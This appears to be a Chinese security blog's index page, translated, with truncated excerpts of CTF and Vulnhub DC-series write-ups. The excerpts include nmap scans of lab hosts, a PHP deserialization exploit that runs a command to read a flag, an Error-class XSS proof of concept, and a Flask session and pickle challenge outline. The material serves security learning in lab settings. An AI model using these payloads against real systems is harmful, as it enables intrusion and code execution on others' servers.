Mybatis Quick Start
Mybatis Quick Start: configuring the mybatis-config.xml file.
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE configuration PUBLIC "-//mybatis.org//DTD Config 3.0//EN" "https://mybatis.org/dtd/mybatis-3-config.dtd">
<configuration>
    <environments default="development">
        <environment id="development">
            <transactionManager type="JDBC"/>
            & ...
Who Ate My Takeout WP
After downloading, there is just a single image.
Carve it with foremost, which gives:
Obviously base64; extract the characters after the underscore in each entry.
import zipfile
import re

zipfile = zipfile.ZipFile('外卖箱.zip', 'r')
filenames = zipfile.namelist()
filenames = filenames[5:]
dic = {}
for i in filenames:
    if re.search(r'(\d+)_(.*)', i).group(1) == "1":
        dic[int(re.search(r'(\d+)_(.*)', i).group(1))] = " "
        continue
    dic[int(re.search(r'(\d+)_(.*)', i).group(1))] = re.search(r'(\d+)_([A-Za-z0 ...
Vulnhub: DC-6
Information gathering. Information gathering includes collecting information about the target machine!!!!!!
The rockyou.txt file is hinted at, so this is very likely a brute-force attack.
nmap
# Nmap 7.80 scan initiated Tue Oct 31 16:50:52 2023 as: nmap -sn -oN nmap.txt --min-rate 8000 192.168.177.1/24
Nmap scan report for 192.168.177.143
Host is up (0.00089s latency).
# Nmap done at Tue Oct 31 16:50:59 2023 -- 256 IP addresses (1 host up) scanned in 6.31 seconds
# Nmap 7.80 scan initiated Tue Oct 31 16:51:59 2023 as: nmap -sV -sC -A -oN nmap.txt --append-output -min-rate 8000 192.168.177.143
Nma ...
Vulnhub: DC-4
Information gathering. IP: 192.168.177.140
Port scan
nmap -sV -sC -O -A -oN vulnhubs/DC-4/nmap.txt --min-rate 10000 192.168.177.140
# Nmap 7.80 scan initiated Fri Oct 27 18:37:38 2023 as: nmap -sV -sC -O -A -oN vulnhubs/DC-4/nmap.txt --min-rate 10000 192.168.177.140
Nmap scan report for 192.168.177.140
Host is up (0.00094s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-h ...
Vulnhub: DC-3
Host discovery
nmap -sn 192.168.177.1/24 --min-rate 8000
Starting Nmap 7.80 ( https://nmap.org ) at 2023-10-25 18:16 CST
Nmap scan report for 192.168.177.139
Host is up (0.00041s latency).
Nmap done: 256 IP addresses (1 host up) scanned in 1.38 seconds
IP: 192.168.177.139
Port scan
nmap -sV -O -A -p- -oN vulnhubs/DC-3/scan/nmap.txt 192.168.177.139 --min-rate 8000
Nmap scan report for 192.168.177.139
Host is up (0.00063s latency).
Not shown: 65534 closed ports ...
Vulnhub: DC-2
This box has a lot of flags...
Information gathering. IP scan:
nmap -sn 192.168.177.1/24 --min-rate 8000
IP: 192.168.177.138
Port scan:
nmap -sV -O -A -p- -oA ./scan/nmap_scan.nmap --min-rate=8000 192.168.177.138
# Nmap 7.80 scan initiated Tue Oct 24 19:49:04 2023 as: nmap -sV -O -A -p- -oA ./scan/nmap_scan.nmap --min-rate=8000 192.168.177.138
Nmap scan report for bogon (192.168.177.138)
Host is up (0.00059s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERS ...
Vulnhub: DC-1
Information gathering
nmap -sV -A --script=vuln -oN ./nmap_scan/DC-1.txt 192.168.177.133
# Nmap 7.80 scan initiated Thu Oct 19 19:30:37 2023 ...
NewStart WEEK2 WEB
Game Master: change the value of the gameScore parameter in the browser console, then just let the game end.
ez_sql: SQLmap gets it directly.
Unserialize?: deserialization; the only thing to watch is that the property is private.
exp:
<?php
highlight_file(__FILE__);
// Maybe you need learn some knowledge about deserialize?
class evil{
    private $cmd="nl /th1s_1s_fffflllll4444aaaggggg";
}
$a = new evil();
echo urlencode(serialize($a));
?>
R!!C!!E!!: the challenge hints that we should scan, so scan!!!
Fire up dirsearch.
The scan shows that .git cannot be accessed directly, but other files under that directory can be,
and bo0g1pop.php is found in .git/COMMIT_EDITMSG.
Source code:
<?php
highlight_file(__FILE__);
if (';' === preg_r ...
Exploiting PHP Built-in Classes
Applicable scenarios: in PHP deserialization, when there is no POP chain, or the POP chain gets stuck halfway through construction, built-in classes can be used for XSS and similar.
Using the Error/Exception classes for XSS. The Error built-in class:
Applies to PHP 7
Error reporting must be enabled
Key to the exploit:
The Error class has a built-in __toString method, which is frequently invoked during deserialization; if a POP chain cannot be built, this can be used instead.
Example:
<?php
$a = unserialize($_GET['input']);
echo $a;
?>
POC:
<?php
$a = new Error("<script>alert('hello')</script>");
$b = serialize($a);
echo urlencode($b);
?>
// O%3A5%3A%22Error%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A31%3A%22%3Cscript%3Ealert%28%27hello%27%2 ...
Yangcheng Cup: Serpent
Roughly three steps in total.
Flask session forgery
Pickle deserialization
Using a SUID binary to read the flag file
The challenge hints at downloading the site backup www.zip; it turns out to contain app.py, which, as expected, is a Flask application.
from flask import Flask, session
from secret import secret

@app.route('/verification')
def verification():
    try:
        attribute = session.get('Attribute')
        if not isinstance(attribute, dict):
            raise Exception
    except Exception:
        return 'Hacker!!!'
    if attribute.get('name') == 'admin' ...